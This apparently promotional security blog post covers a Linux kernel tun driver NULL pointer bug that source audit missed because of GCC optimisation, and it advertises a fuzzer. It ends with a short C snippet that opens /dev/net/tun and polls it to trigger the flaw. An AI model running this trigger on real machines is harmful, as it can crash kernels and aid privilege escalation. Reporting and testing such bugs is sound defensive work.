When source code audit fails
A NULL reference vulnerability in the tun source code of the Linux kernel has been discovered to be “immune” if the code is audited, and vulnerable once GCC has put into place its code optimizations.
The vulnerability allows executing arbitrary code and gaining root access.
An exploit has been released proving that the vulnerability is not just “theoretically” there, but can be actually exploited.
Need we say Black Box Fuzzing? a API fuzzer such as beSTORM would have easily caught as beSTORM can be told to open the /dev/net/tun driver and write data directly to it, one of the first tests it will preform will be the “old” nothing (NULL) data transfer.
BTW: If you want to test the vulnerability on your kernel here is a code snip:
int fd; struct pollfd pfd; fd = open("/dev/net/tun", O_RDWR); pfd.fd = fd; pfd.events = POLLIN | POLLOUT; poll(&pfd, 1, 0);